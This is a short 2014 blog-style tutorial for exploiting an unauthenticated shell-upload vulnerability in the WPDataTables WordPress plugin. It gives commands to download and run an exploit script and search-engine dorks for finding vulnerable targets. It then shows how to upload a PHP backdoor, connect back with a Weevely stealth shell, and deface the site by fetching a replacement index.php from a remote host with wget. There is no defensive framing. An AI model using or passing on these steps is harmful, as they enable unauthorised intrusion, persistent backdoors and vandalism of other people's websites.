Monday, 24 November 2014

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass




Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php




Bypassing Not Acceptable
Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php

    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php